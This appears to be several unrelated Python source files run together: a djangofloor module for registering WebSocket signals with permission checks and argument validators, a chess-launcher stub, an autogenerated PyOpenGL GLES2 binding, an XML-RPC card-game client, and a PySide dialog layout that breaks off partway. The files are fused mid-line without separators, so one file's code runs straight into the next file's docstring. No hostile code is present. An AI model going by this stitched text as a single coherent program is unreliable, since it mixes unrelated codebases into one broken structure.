browser is allowed to call this code. By default, the registered code can only be called from Python code. The callable takes three arguments: * the called :class:`djangofloor.decorators.Connection` (signal or ws function), * the :class:`djangofloor.window_info.WindowInfo` object, * the kwarg dict with unmodified arguments. Argument validators ------------------- The registered Python code can use py3 annotation for specifying data types. .. 
code-block:: python from djangofloor.decorators import Choice, RE, SerializedForm from django import forms class MyForm(forms.Form): test = forms.CharField() @signal(path='demo.signal') def my_signal(window_info, kwarg1: Choice([1, 2], int)=1, kwarg2: Re('^\\d+$', int)=2, kwarg3: SerializedForm(MyForm)): assert isinstance(kwarg1, int) assert isinstance(kwarg2, int) assert isinstance(kwarg3, MyForm) scall(window_info, 'demo.signal', to=[SERVER], kwarg1="1", kwarg2="12312", kwarg3=[{'value': '12', 'name': 'test'}]) """ import io import logging import mimetypes import os import random import re import warnings from django import forms from django.conf import settings from django.core.files.uploadedfile import InMemoryUploadedFile from django.forms import FileField from django.http import QueryDict from djangofloor.utils import RemovedInDjangoFloor200Warning try: from inspect import signature except ImportError: # noinspection PyUnresolvedReferences,PyPackageRequirements from funcsigs import signature __author__ = "" logger = logging.getLogger("djangofloor.signals") REGISTERED_SIGNALS = {} REGISTERED_FUNCTIONS = {} class DynamicQueueName: """Allow to dynamically select a Celery queue when the signal is called. You can use it if all signals of a user must be processed by the same worker, but you still want to dispatch signals to several workers. """ def __call__(self, connection, window_info, original_kwargs): """called for each signal call to dispatch this connection""" raise NotImplementedError def get_available_queues(self): """return the set of all queues that can be returned by the `__call__` method. However, if this method is not implemented, the impact is currently limited: * the monitoring view will not display all required queues, * the systemd service files (provided by the `packaging` command) will not create all required workers. """ return {settings.CELERY_DEFAULT_QUEUE} class RandomDynamicQueueName(DynamicQueueName): """Return a random queue on each signal call. This class is somewhat useless since you could just run more workers on the same queue. >>> q = RandomDynamicQueueName('prefix-', 2) >>> q.get_available_queues() == {'prefix-0', 'prefix-1'} True >>> q(None, None, None) in {'prefix-0', 'prefix-1'} True """ def __init__(self, prefix: str, size: int): """ :param prefix: prefix of the queue :param size: number of available queues """ self.prefix = prefix self.size = size def __call__(self, connection, window_info, original_kwargs): return "%s%d" % (self.prefix, random.randint(0, self.size - 1)) def get_available_queues(self): return {"%s%d" % (self.prefix, x) for x in range(self.size)} # noinspection PyUnusedLocal def server_side(connection, window_info, kwargs): """never allows a signal to be called from WebSockets; this signal can only be called from Python code. This is the default choice. 
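# A minimal sketch of a per-user queue selector built on DynamicQueueName,
# in the spirit of RandomDynamicQueueName above: signals from the same user
# always map to the same queue, while load is still spread over `size`
# workers. The `user_pk` attribute on window_info is assumed here purely for
# illustration; substitute whatever per-user key your WindowInfo carries.
class PerUserDynamicQueueName(DynamicQueueName):
    def __init__(self, prefix: str, size: int):
        self.prefix = prefix
        self.size = size

    def __call__(self, connection, window_info, original_kwargs):
        # anonymous callers (no per-user key) fall back to queue 0
        user_pk = getattr(window_info, "user_pk", None) or 0
        return "%s%d" % (self.prefix, user_pk % self.size)

    def get_available_queues(self):
        return {"%s%d" % (self.prefix, x) for x in range(self.size)}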
>>> @signal(is_allowed_to=server_side) >>> def my_signal(window_info, arg1=None): >>> print(window_info, arg1) """ return False # noinspection PyUnusedLocal def everyone(connection, window_info, kwargs): """allow everyone to call a Python WS signal or remote function >>> @signal(is_allowed_to=everyone) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return True # noinspection PyUnusedLocal def is_authenticated(connection, window_info, kwargs): """restrict a WS signal or a WS function to authenticated users >>> @signal(is_allowed_to=is_authenticated) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_authenticated # noinspection PyUnusedLocal def is_anonymous(connection, window_info, kwargs): """restrict a WS signal or a WS function to anonymous users >>> @signal(is_allowed_to=is_anonymous) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_anonymous # noinspection PyUnusedLocal def is_staff(connection, window_info, kwargs): """restrict a WS signal or a WS function to staff users >>> @signal(is_allowed_to=is_staff) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_staff # noinspection PyUnusedLocal def is_superuser(connection, window_info, kwargs): """restrict a WS signal or a WS function to superusers >>> @signal(is_allowed_to=is_superuser) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ return window_info and window_info.is_superuser # noinspection PyPep8Naming class has_perm: """restrict a WS signal or a WS function to users with permission "perm" >>> @signal(is_allowed_to=has_perm('app_label.codename')) >>> def my_signal(request, arg1=None): >>> print(request, arg1) """ def __init__(self, perm): self.perm = perm # noinspection PyUnusedLocal def __call__(self, connection, window_info, kwargs): return window_info and window_info.has_perm(self.perm) class Connection: """Parent class of a registered signal or remote function. Do not use it directly.""" required_function_arg = "window_info" def __init__(self, fn, path=None, is_allowed_to=server_side, queue=None): self.function = fn if not path: if getattr(fn, "__module__", None) and getattr(fn, "__name__", None): path = "%s.%s" % (fn.__module__, fn.__name__) elif getattr(fn, "__name__", None): path = fn.__name__ self.path = str(path) if not re.match(r"^([_a-zA-Z]\w*)(\.[_a-zA-Z]\w*)*$", self.path): raise ValueError("Invalid identifier: %s" % self.path) self.is_allowed_to = is_allowed_to self.queue = queue or settings.CELERY_DEFAULT_QUEUE self.accept_kwargs = False self.argument_types = {} self.required_arguments_names = set() self.optional_arguments_names = set() self.accepted_argument_names = set() self.signature_check(fn) # noinspection PyTypeChecker if hasattr(fn, "__name__"): self.__name__ = fn.__name__ def signature_check(self, fn): """Analyze the signature of the registered Python code, and store the annotations. Check if the first argument is `window_info`. 
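# Illustrative sketch only: is_allowed_to accepts any callable taking
# (connection, window_info, kwargs), so checks compose freely. The class
# below (not part of djangofloor) allows staff users or holders of a given
# permission, mirroring the has_perm pattern above.
class staff_or_has_perm:
    def __init__(self, perm):
        self.perm = perm

    # noinspection PyUnusedLocal
    def __call__(self, connection, window_info, kwargs):
        if not window_info:
            return False
        return window_info.is_staff or window_info.has_perm(self.perm)

# usage:
# @signal(path="demo.admin_signal", is_allowed_to=staff_or_has_perm("app.change_thing"))
# def admin_signal(window_info, arg1=None):
#     print(window_info, arg1)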
""" # fetch signature to analyze arguments sig = signature(fn) required_arg_is_present = False for key, param in sig.parameters.items(): if key == self.required_function_arg: required_arg_is_present = True continue if param.kind == param.VAR_KEYWORD: # corresponds to "fn(**kwargs)" self.accept_kwargs = True elif param.kind == param.VAR_POSITIONAL: # corresponds to "fn(*args)" raise ValueError("Cannot connect a signal using the *%s syntax" % key) elif ( param.default == param.empty ): # "fn(foo)" : kind = POSITIONAL_ONLY or POSITIONAL_OR_KEYWORD self.required_arguments_names.add(key) if param.annotation != param.empty and callable(param.annotation): self.argument_types[key] = param.annotation self.accepted_argument_names.add(key) else: # "fn(foo=bar)" : kind = POSITIONAL_OR_KEYWORD or KEYWORD_ONLY self.optional_arguments_names.add(key) self.accepted_argument_names.add(key) if param.annotation != param.empty and callable(param.annotation): self.argument_types[key] = param.annotation if self.required_function_arg and not required_arg_is_present: msg = '%s(%s) must takes "%s" as first argument' % ( self.__class__.__name__, self.path, self.required_function_arg, ) raise ValueError(msg) def check(self, kwargs): """Check the provided kwargs and apply provided annotations to it. Return `None` if something is invalid (like an error raised by an annotation or a missing argument). """ cls = self.__class__.__name__ for k, v in self.argument_types.items(): try: if k in kwargs: kwargs[k] = v(kwargs[k]) except ValueError: logger.warning( '%s("%s"): Invalid value %r for argument "%s".' % (cls, self.path, kwargs[k], k) ) return None except TypeError: logger.warning( '%s("%s"): Invalid value %r for argument "%s".' % (cls, self.path, kwargs[k], k) ) return None for k in self.required_arguments_names: if k not in kwargs: logger.warning( '%s("%s"): Missing required argument "%s".' % (cls, self.path, k) ) return None if not self.accept_kwargs: for k in kwargs: if k not in self.accepted_argument_names: logger.warning( '%s("%s"): Invalid argument "%s".' % (cls, self.path, k) ) return None return kwargs def __call__(self, window_info, **kwargs): return self.function(window_info, **kwargs) def register(self): """Register the Python code to the right dict.""" raise NotImplementedError def get_queue(self, window_info, original_kwargs): """Provide the Celery queue name as a string.""" if callable(self.queue): return str(self.queue(self, window_info, original_kwargs)) return str(self.queue) or settings.CELERY_DEFAULT_QUEUE class SignalConnection(Connection): """represents a connected signal. """ def register(self): """register the signal into the `REGISTERED_SIGNALS` dict """ REGISTERED_SIGNALS.setdefault(self.path, []).append(self) def call(self, window_info, **kwargs): from djangofloor.tasks import call, SERVER call(window_info, self.path, to=SERVER, kwargs=kwargs) class FunctionConnection(Connection): """represent a WS function """ def register(self): """register the WS function into the `REGISTERED_FUNCTIONS` dict """ REGISTERED_FUNCTIONS[self.path] = self class FormValidator(FunctionConnection): """Special signal, dedicated to dynamically validate a HTML form. However, files cannot be sent in the validation process. """ def signature_check(self, fn): """override the default method for checking the arguments, since they are independent from the Django Form. 
""" if not isinstance(fn, type) or not issubclass(fn, forms.BaseForm): raise ValueError("validate_form only apply to Django Forms") self.required_arguments_names = set() self.optional_arguments_names = {"data"} self.accepted_argument_names = {"data"} def __call__(self, window_info, data=None): form = SerializedForm(self.function)(data) valid = form.is_valid() return { "valid": valid, "errors": { f: e.get_json_data(escape_html=False) for f, e in form.errors.items() }, "help_texts": { f: e.help_text for (f, e) in form.fields.items() if e.help_text }, } def signal( fn=None, path=None, is_allowed_to=server_side, queue=None, cls=SignalConnection ): """Decorator to use for registering a new signal. This decorator returns the original callable as-is. """ def wrapped(fn_): wrapper = cls(fn=fn_, path=path, is_allowed_to=is_allowed_to, queue=queue) wrapper.register() return fn_ if fn is not None: wrapped = wrapped(fn) return wrapped # noinspection PyShadowingBuiltins def function(fn=None, path=None, is_allowed_to=server_side, queue=None): """Allow the following Python code to be called from the JavaScript code. The result of this function is serialized (with JSON and `settings.WEBSOCKET_SIGNAL_ENCODER`) before being sent to the JavaScript part. .. code-block:: python from djangofloor.decorators import function, everyone @function(path='myproject.myfunc', is_allowed_to=everyone) def myfunc(window_info, arg=None) print(arg) return 42 The this function can be called from your JavaScript code: .. code-block:: javascript $.dfws.myproject.myfunc({arg: 3123}).then(function(result) { alert(result); }); """ return signal( fn=fn, path=path, is_allowed_to=is_allowed_to, queue=queue, cls=FunctionConnection, ) def validate_form(form_cls=None, path=None, is_allowed_to=server_side, queue=None): """ Decorator for automatically validating HTML forms. Just add it to your Python code and set the 'onchange' attribute to your HTML code. The `path` argument should be unique to your form class. :param form_cls: any subclass of :class:`django.forms.Form` :param path: unique name of your form :param is_allowed_to: callable for restricting the use of the form validation :param queue: name (or callable) for ensuring small response times .. code-block:: python from djangofloor.decorators import everyone, validate_form @validate_form(path='djangofloor.validate.search', is_allowed_to=everyone, queue='fast') class MyForm(forms.Form): name = forms.CharField() ... .. code-block:: html
    {% csrf_token %} {% bootstrap_form form %}
    """ if path is None or is_allowed_to is server_side: # @validate_form # class MyForm(forms.Form): # ... raise ValueError( "is_allowed_to and path are not configured for the validate_form decorator" ) def wrapped(form_cls_): wrapper = FormValidator( form_cls_, path=path, is_allowed_to=is_allowed_to, queue=queue ) wrapper.register() return form_cls_ if form_cls: return wrapped(form_cls) return wrapped class RE: """ used to check if a string value matches a given regexp. Example (requires Python 3.2+), for a function that can only handle a string of the form 123a456: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value: RE('\\d{3}a\\d{3}')): pass Your code won't be called for values like "abc". :param value: regexp pattern :type value: `str` :param caster: if not `None`, any callable applied to the value (if valid) :type caster: `callable` or `None` :param flags: regexp flags passed to `re.compile` :type flags: `int` """ def __init__(self, value, caster=None, flags=0): self.caster = caster self.regexp = re.compile(value, flags=flags) def __call__(self, value): matcher = self.regexp.match(str(value)) if not matcher: raise ValueError value = matcher.group(1) if matcher.groups() else value return self.caster(value) if self.caster else value class Choice: """ used to check if a value is among some valid choices. Example (requires Python 3.2+), for a function that can only two values: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value: Choice([True, False])): pass Your code wan't be called if value is not True or False. :param caster: callable to convert the provided deserialized JSON data before checking its validity. """ def __init__(self, values, caster=None): self.values = set(values) self.caster = caster def __call__(self, value): value = self.caster(value) if self.caster else value if value not in self.values: raise ValueError return value class SerializedForm: """Transform values sent by JS to a Django form. Given a form and a :class:`list` of :class:`dict`, transforms the :class:`list` into a :class:`django.http.QueryDict` and initialize the form with it. >>> from django import forms >>> class SimpleForm(forms.Form): ... field = forms.CharField() ... >>> x = SerializedForm(SimpleForm) >>> form = x([{'name': 'field', 'value': 'object'}]) >>> form.is_valid() True How to use it with Python3: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value: SerializedForm(SimpleForm), other: int): print(value.is_valid()) How to use it with Python2: .. code-block:: python @signal(path='myproject.signals.test') def test(window_info, value, other): value = SerializedForm(SimpleForm)(value) print(value.is_valid()) On the JS side, you can serialize the form with JQuery: .. code-block:: html
    """ def __init__(self, form_cls): self.form_cls = form_cls def __call__(self, value, *args, **kwargs): """ :param value: :type value: :class:`list` of :class:`dict` :return: :rtype: :class:`django.forms.Form` """ if value is None: return self.form_cls(*args, **kwargs) post_data = QueryDict("", mutable=True) file_data = QueryDict("", mutable=True) for obj in value: name = obj["name"] value = obj["value"] if name in self.form_cls.base_fields and isinstance( self.form_cls.base_fields[name], FileField ): mimetypes.init() basename = os.path.basename(value) (type_, __) = mimetypes.guess_type(basename) # it's a file => we need to simulate an uploaded one content = InMemoryUploadedFile( io.BytesIO(b"\0"), name, basename, type_ or "application/binary", 1, "utf-8", ) file_data.update({name: content}) else: post_data.update({name: value}) return self.form_cls(post_data, file_data, *args, **kwargs) class LegacySignalConnection(SignalConnection): """.. deprecated:: 1.0 do not use it""" def __call__(self, window_info, **kwargs): result = super().__call__(window_info, **kwargs) if result: # noinspection PyUnresolvedReferences from djangofloor.tasks import df_call for data in result: df_call( data["signal"], window_info, sharing=data.get("sharing"), from_client=False, kwargs=data["options"], ) def connect( fn=None, path=None, delayed=False, allow_from_client=True, auth_required=True ): """.. deprecated:: 1.0 do not use it""" delayed = delayed if not delayed: warnings.warn( 'The "delayed" argument is deprecated and useless.', RemovedInDjangoFloor200Warning, ) if allow_from_client and auth_required: is_allowed_to = is_authenticated elif allow_from_client: is_allowed_to = everyone else: is_allowed_to = server_side return signal(fn=fn, path=path, is_allowed_to=is_allowed_to) 0 from TaserChess_Main import * main()'''Autogenerated by xml_generate script, do not edit!''' from OpenGL import platform as _p, arrays # Code generation uses this from OpenGL.raw.GLES2 import _types as _cs # End users want this... from OpenGL.raw.GLES2._types import * from OpenGL.raw.GLES2 import _errors from OpenGL.constant import Constant as _C import ctypes _EXTENSION_NAME = 'GLES2_OES_texture_border_clamp' def _f( function ): return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_OES_texture_border_clamp',error_checker=_errors._error_checker) GL_CLAMP_TO_BORDER_OES=_C('GL_CLAMP_TO_BORDER_OES',0x812D) GL_TEXTURE_BORDER_COLOR_OES=_C('GL_TEXTURE_BORDER_COLOR_OES',0x1004) @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLintArray) def glGetSamplerParameterIivOES(sampler,pname,params):pass @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLuintArray) def glGetSamplerParameterIuivOES(sampler,pname,params):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray) def glGetTexParameterIivOES(target,pname,params):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLuintArray) def glGetTexParameterIuivOES(target,pname,params):pass @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLintArray) def glSamplerParameterIivOES(sampler,pname,param):pass @_f @_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLuintArray) def glSamplerParameterIuivOES(sampler,pname,param):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray) def glTexParameterIivOES(target,pname,params):pass @_f @_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLuintArray) def glTexParameterIuivOES(target,pname,params):pass tupelo/xmlrpc.py #!/usr/bin/env python # vim: set sts=4 sw=4 et: import time import xmlrpc.client from . import players from . 
import rpc from .common import GameState, CardSet, GameError, RuleError, ProtocolError, simple_decorator from .events import EventList, CardPlayedEvent, MessageEvent, TrickPlayedEvent, TurnEvent, StateChangedEvent @simple_decorator def error2fault(func): """ Catch known exceptions and translate them to XML-RPC faults. """ def catcher(*args): try: return func(*args) except GameError as error: raise xmlrpc.client.Fault(GameError.rpc_code, str(error)) except RuleError as error: raise xmlrpc.client.Fault(RuleError.rpc_code, str(error)) except ProtocolError as error: raise xmlrpc.client.Fault(ProtocolError.rpc_code, str(error)) return catcher @simple_decorator def fault2error(func): """ Catch known XML-RPC faults and translate them to custom exceptions. """ def catcher(*args): try: return func(*args) except xmlrpc.client.Fault as error: error_classes = (GameError, RuleError, ProtocolError) for klass in error_classes: if error.faultCode == klass.rpc_code: raise klass(error.faultString) raise error return catcher class XMLRPCCliPlayer(players.CliPlayer): """ XML-RPC command line interface human player. """ def __init__(self, player_name): players.CliPlayer.__init__(self, player_name) self.game_state = GameState() self.hand = None def handle_event(self, event): if isinstance(event, CardPlayedEvent): self.card_played(event.player, event.card, event.game_state) elif isinstance(event, MessageEvent): self.send_message(event.sender, event.message) elif isinstance(event, TrickPlayedEvent): self.trick_played(event.player, event.game_state) elif isinstance(event, TurnEvent): self.game_state.update(event.game_state) state = self.controller.get_state(self.id) self.hand = state['hand'] self.game_state.update(state['game_state']) elif isinstance(event, StateChangedEvent): self.game_state.update(event.game_state) else: print("unknown event: %s" % event) def wait_for_turn(self): """ Wait for this player's turn. """ while True: time.sleep(0.5) if self.controller is not None: events = self.controller.get_events(self.id) for event in events: self.handle_event(event) if self.game_state.turn_id == self.id: break class XMLRPCProxyController(): """ Client-side proxy object for the server/GameController. 
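# Self-contained sketch of the fault round trip implemented by error2fault
# and fault2error above: a server-side exception carrying an rpc_code is
# turned into an xmlrpc.client.Fault, and the client-side wrapper maps the
# Fault back to the original exception type. ToyError stands in for
# GameError / RuleError / ProtocolError.
import xmlrpc.client


class ToyError(Exception):
    rpc_code = 1001


def server_call():
    try:
        raise ToyError("not your turn")
    except ToyError as error:              # what error2fault does
        raise xmlrpc.client.Fault(ToyError.rpc_code, str(error))


def client_call():
    try:
        server_call()
    except xmlrpc.client.Fault as fault:   # what fault2error does
        if fault.faultCode == ToyError.rpc_code:
            raise ToyError(fault.faultString)
        raise


# client_call() raises ToyError("not your turn") back on the caller's side.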
""" def __init__(self, server_uri): super(XMLRPCProxyController, self).__init__() if not server_uri.startswith('http://') and \ not server_uri.startswith('https://'): server_uri = 'http://' + server_uri self.server = xmlrpc.client.ServerProxy(server_uri) self.game_id = None self.akey = None @fault2error def play_card(self, _player, card): self.server.game.play_card(self.akey, self.game_id, rpc.rpc_encode(card)) @fault2error def get_events(self, _player_id): return rpc.rpc_decode(EventList, self.server.get_events(self.akey)) @fault2error def get_state(self, _player_id): state = self.server.game.get_state(self.akey, self.game_id) state['game_state'] = rpc.rpc_decode(GameState, state['game_state']) state['hand'] = rpc.rpc_decode(CardSet, state['hand']) return state @fault2error def player_quit(self, _player_id): self.server.player.quit(self.akey) @fault2error def register_player(self, player): player.controller = self plr_data = self.server.player.register(rpc.rpc_encode(player)) player.id = plr_data['id'] self.akey = plr_data['akey'] @fault2error def start_game_with_bots(self): return self.server.game.start_with_bots(self.akey, self.game_id) @fault2error def create_game(self): self.game_id = self.server.game.create(self.akey) return self.game_id # -*- coding: utf-8 -*- # Form implementation generated from reading ui file '/home/eoyilmaz/Documents/development/oyProjectManager/oyProjectManager/ui/version_creator.ui' # # Created: Sun Oct 21 23:07:49 2012 # by: pyside-uic 0.2.13 running on PySide 1.1.1 # # WARNING! All changes made in this file will be lost! from PySide import QtCore, QtGui class Ui_Dialog(object): def setupUi(self, Dialog): Dialog.setObjectName("Dialog") Dialog.setWindowModality(QtCore.Qt.ApplicationModal) Dialog.resize(1312, 689) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(1) sizePolicy.setVerticalStretch(1) sizePolicy.setHeightForWidth(Dialog.sizePolicy().hasHeightForWidth()) Dialog.setSizePolicy(sizePolicy) Dialog.setSizeGripEnabled(True) Dialog.setModal(True) self.horizontalLayout = QtGui.QHBoxLayout(Dialog) self.horizontalLayout.setObjectName("horizontalLayout") self.verticalWidget = QtGui.QWidget(Dialog) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(1) sizePolicy.setVerticalStretch(1) sizePolicy.setHeightForWidth(self.verticalWidget.sizePolicy().hasHeightForWidth()) self.verticalWidget.setSizePolicy(sizePolicy) self.verticalWidget.setObjectName("verticalWidget") self.verticalLayout = QtGui.QVBoxLayout(self.verticalWidget) self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetMaximumSize) self.verticalLayout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.setObjectName("verticalLayout") self.horizontalLayout_11 = QtGui.QHBoxLayout() self.horizontalLayout_11.setObjectName("horizontalLayout_11") self.projects_label = QtGui.QLabel(self.verticalWidget) self.projects_label.setObjectName("projects_label") self.horizontalLayout_11.addWidget(self.projects_label) self.projects_comboBox = QtGui.QComboBox(self.verticalWidget) self.projects_comboBox.setMaxVisibleItems(50) self.projects_comboBox.setObjectName("projects_comboBox") self.horizontalLayout_11.addWidget(self.projects_comboBox) self.client_label = QtGui.QLabel(self.verticalWidget) self.client_label.setObjectName("client_label") self.horizontalLayout_11.addWidget(self.client_label) self.client_name_label = 
QtGui.QLabel(self.verticalWidget) self.client_name_label.setObjectName("client_name_label") self.horizontalLayout_11.addWidget(self.client_name_label) spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_11.addItem(spacerItem) self.user_label = QtGui.QLabel(self.verticalWidget) self.user_label.setObjectName("user_label") self.horizontalLayout_11.addWidget(self.user_label) self.users_comboBox = QtGui.QComboBox(self.verticalWidget) self.users_comboBox.setObjectName("users_comboBox") self.horizontalLayout_11.addWidget(self.users_comboBox) self.verticalLayout.addLayout(self.horizontalLayout_11) self.line_3 = QtGui.QFrame(self.verticalWidget) self.line_3.setFrameShape(QtGui.QFrame.HLine) self.line_3.setFrameShadow(QtGui.QFrame.Sunken) self.line_3.setObjectName("line_3") self.verticalLayout.addWidget(self.line_3) self.horizontalLayout_14 = QtGui.QHBoxLayout() self.horizontalLayout_14.setObjectName("horizontalLayout_14") self.verticalLayout_5 = QtGui.QVBoxLayout() self.verticalLayout_5.setSpacing(6) self.verticalLayout_5.setObjectName("verticalLayout_5") self.tabWidget = QtGui.QTabWidget(self.verticalWidget) self.tabWidget.setEnabled(True) self.tabWidget.setObjectName("tabWidget") self.assets_tab = QtGui.QWidget() self.assets_tab.setEnabled(True) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(1) sizePolicy.setVerticalStretch(1) sizePolicy.setHeightForWidth(self.assets_tab.sizePolicy().hasHeightForWidth()) self.assets_tab.setSizePolicy(sizePolicy) self.assets_tab.setObjectName("assets_tab") self.verticalLayout_4 = QtGui.QVBoxLayout(self.assets_tab) self.verticalLayout_4.setObjectName("verticalLayout_4") self.asset_info_groupBox = QtGui.QGroupBox(self.assets_tab) self.asset_info_groupBox.setFlat(False) self.asset_info_groupBox.setObjectName("asset_info_groupBox") self.verticalLayout_3 = QtGui.QVBoxLayout(self.asset_info_groupBox) self.verticalLayout_3.setObjectName("verticalLayout_3") self.horizontalLayout_3 = QtGui.QHBoxLayout() self.horizontalLayout_3.setObjectName("horizontalLayout_3") self.verticalLayout_2 = QtGui.QVBoxLayout() self.verticalLayout_2.setObjectName("verticalLayout_2") self.horizontalLayout_9 = QtGui.QHBoxLayout() self.horizontalLayout_9.setObjectName("horizontalLayout_9") self.asset_name_label = QtGui.QLabel(self.asset_info_groupBox) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.asset_name_label.setFont(font) self.asset_name_label.setObjectName("asset_name_label") self.horizontalLayout_9.addWidget(self.asset_name_label) spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Minimum) self.horizontalLayout_9.addItem(spacerItem1) self.create_asset_pushButton = QtGui.QPushButton(self.asset_info_groupBox) self.create_asset_pushButton.setObjectName("create_asset_pushButton") self.horizontalLayout_9.addWidget(self.create_asset_pushButton) self.verticalLayout_2.addLayout(self.horizontalLayout_9) self.assets_tableWidget = QtGui.QTableWidget(self.asset_info_groupBox) self.assets_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers) self.assets_tableWidget.setSelectionMode(QtGui.QAbstractItemView.SingleSelection) self.assets_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows) self.assets_tableWidget.setColumnCount(2) self.assets_tableWidget.setObjectName("assets_tableWidget") self.assets_tableWidget.setColumnCount(2) self.assets_tableWidget.setRowCount(0) item = 
QtGui.QTableWidgetItem() self.assets_tableWidget.setHorizontalHeaderItem(0, item) item = QtGui.QTableWidgetItem() self.assets_tableWidget.setHorizontalHeaderItem(1, item) self.assets_tableWidget.horizontalHeader().setStretchLastSection(True) self.verticalLayout_2.addWidget(self.assets_tableWidget) self.horizontalLayout_3.addLayout(self.verticalLayout_2) self.verticalLayout_3.addLayout(self.horizontalLayout_3) self.verticalLayout_4.addWidget(self.asset_info_groupBox) self.tabWidget.addTab(self.assets_tab, "") self.shots_tab = QtGui.QWidget() self.shots_tab.setEnabled(True) self.shots_tab.setObjectName("shots_tab") self.verticalLayout_11 = QtGui.QVBoxLayout(self.shots_tab) self.verticalLayout_11.setObjectName("verticalLayout_11") self.horizontalLayout_15 = QtGui.QHBoxLayout() self.horizontalLayout_15.setObjectName("horizontalLayout_15") self.sequences_label = QtGui.QLabel(self.shots_tab) self.sequences_label.setObjectName("sequences_label") self.horizontalLayout_15.addWidget(self.sequences_label) self.sequences_comboBox = QtGui.QComboBox(self.shots_tab) self.sequences_comboBox.setObjectName("sequences_comboBox") self.horizontalLayout_15.addWidget(self.sequences_comboBox) spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_15.addItem(spacerItem2) self.verticalLayout_11.addLayout(self.horizontalLayout_15) self.asset_info_groupBox_2 = QtGui.QGroupBox(self.shots_tab) self.asset_info_groupBox_2.setFlat(False) self.asset_info_groupBox_2.setObjectName("asset_info_groupBox_2") self.verticalLayout_8 = QtGui.QVBoxLayout(self.asset_info_groupBox_2) self.verticalLayout_8.setObjectName("verticalLayout_8") self.horizontalLayout_12 = QtGui.QHBoxLayout() self.horizontalLayout_12.setObjectName("horizontalLayout_12") self.verticalLayout_9 = QtGui.QVBoxLayout() self.verticalLayout_9.setObjectName("verticalLayout_9") self.horizontalLayout_13 = QtGui.QHBoxLayout() self.horizontalLayout_13.setObjectName("horizontalLayout_13") self.shot_name_label = QtGui.QLabel(self.asset_info_groupBox_2) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.shot_name_label.setFont(font) self.shot_name_label.setObjectName("shot_name_label") self.horizontalLayout_13.addWidget(self.shot_name_label) spacerItem3 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_13.addItem(spacerItem3) self.create_shot_pushButton = QtGui.QPushButton(self.asset_info_groupBox_2) self.create_shot_pushButton.setEnabled(False) self.create_shot_pushButton.setObjectName("create_shot_pushButton") self.horizontalLayout_13.addWidget(self.create_shot_pushButton) self.verticalLayout_9.addLayout(self.horizontalLayout_13) self.shots_listWidget = QtGui.QListWidget(self.asset_info_groupBox_2) self.shots_listWidget.setObjectName("shots_listWidget") self.verticalLayout_9.addWidget(self.shots_listWidget) self.gridLayout = QtGui.QGridLayout() self.gridLayout.setObjectName("gridLayout") self.frame_range_label = QtGui.QLabel(self.asset_info_groupBox_2) self.frame_range_label.setObjectName("frame_range_label") self.gridLayout.addWidget(self.frame_range_label, 0, 0, 1, 1) self.start_frame_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.start_frame_spinBox.setMaximum(9999) self.start_frame_spinBox.setObjectName("start_frame_spinBox") self.gridLayout.addWidget(self.start_frame_spinBox, 0, 1, 1, 1) self.end_frame_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.end_frame_spinBox.setMaximum(9999) 
self.end_frame_spinBox.setObjectName("end_frame_spinBox") self.gridLayout.addWidget(self.end_frame_spinBox, 0, 2, 1, 1) self.handles_label = QtGui.QLabel(self.asset_info_groupBox_2) self.handles_label.setObjectName("handles_label") self.gridLayout.addWidget(self.handles_label, 1, 0, 1, 1) self.handle_at_start_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.handle_at_start_spinBox.setMaximum(9999) self.handle_at_start_spinBox.setObjectName("handle_at_start_spinBox") self.gridLayout.addWidget(self.handle_at_start_spinBox, 1, 1, 1, 1) self.handle_at_end_spinBox = QtGui.QSpinBox(self.asset_info_groupBox_2) self.handle_at_end_spinBox.setMaximum(9999) self.handle_at_end_spinBox.setObjectName("handle_at_end_spinBox") self.gridLayout.addWidget(self.handle_at_end_spinBox, 1, 2, 1, 1) self.shot_info_update_pushButton = QtGui.QPushButton(self.asset_info_groupBox_2) self.shot_info_update_pushButton.setObjectName("shot_info_update_pushButton") self.gridLayout.addWidget(self.shot_info_update_pushButton, 1, 3, 1, 1) self.verticalLayout_9.addLayout(self.gridLayout) self.horizontalLayout_12.addLayout(self.verticalLayout_9) 